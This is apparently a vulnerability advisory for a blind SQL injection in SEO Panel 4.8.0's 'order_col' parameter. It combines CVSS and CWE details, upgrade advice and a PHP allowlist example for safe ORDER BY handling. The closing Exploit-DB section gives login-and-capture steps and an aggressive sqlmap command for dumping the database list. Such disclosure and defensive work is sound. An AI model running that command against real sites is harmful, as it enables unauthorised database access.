Vendor: SEO Panel
By: Piyush Patil
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: SEO Panel
Affected Version From: 4.8.0
Affected Version To: 4.8.0
Patch Exists: YES
Related CWE: N/A
CPE: a:seopanel:seo_panel:4.8.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
Year: 2021

SEO Panel 4.8.0 – ‘order_col’ Blind SQL Injection (1)

SEO Panel 4.8.0 is vulnerable to blind SQL injection through the 'order_col' parameter of archive.php. After logging in with admin credentials, an attacker can exploit this vulnerability by changing the 'order_col' value to '*' in a captured request and then using the sqlmap tool to execute arbitrary SQL commands on the underlying database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of SEO Panel.
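
Where an upgrade has to wait, or when reviewing similar sort parameters, the usual fix is to map the request value onto a fixed set of column names, because identifiers in ORDER BY cannot be bound as prepared-statement parameters. The following is an added example, not code from SEO Panel or its patch; the function name, the column names and the direction parameter are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request value => column identifier used in SQL.
// These names are illustrative and are not taken from SEO Panel's schema.
const SORTABLE_COLUMNS = [
    'keyword'  => 'k.name',
    'website'  => 'w.name',
    'position' => 'r.position',
    'date'     => 'r.result_date',
];

/**
 * Build an ORDER BY clause from untrusted input.
 * Only values present in the allowlist reach the SQL text; anything else
 * (including "*", expressions or sub-queries) falls back to the default.
 */
function buildOrderBy(?string $orderCol, ?string $direction, string $default = 'date'): string
{
    $key = is_string($orderCol) ? strtolower(trim($orderCol)) : '';
    if (!array_key_exists($key, SORTABLE_COLUMNS)) {
        $key = $default;
    }
    // Direction is a keyword, not data, so it is also chosen from fixed values.
    $dir = (is_string($direction) && strtoupper(trim($direction)) === 'ASC') ? 'ASC' : 'DESC';

    return ' ORDER BY ' . SORTABLE_COLUMNS[$key] . ' ' . $dir;
}

// Constructed sample inputs, as they might arrive in an order_col request parameter.
$samples = ['keyword', 'POSITION', '*', 'position, (SELECT 1)', null];
foreach ($samples as $value) {
    printf("%-26s =>%s\n", var_export($value, true), buildOrderBy($value, 'asc'));
}
```

The request value is only ever used as a lookup key, so no part of it is concatenated into the query text.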

Exploit-DB raw data:

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)
# Date: 17/02/2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: 4.8.0


# Reference - https://github.com/seopanel/Seo-Panel/issues/209

Step 1 - Login to the SEO Panel with admin credentials.
Step 2 - Go to archive.php
Step 3 - Change "order_col" value to "*" and copy the request
Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL --dbs --technique=T --flush-session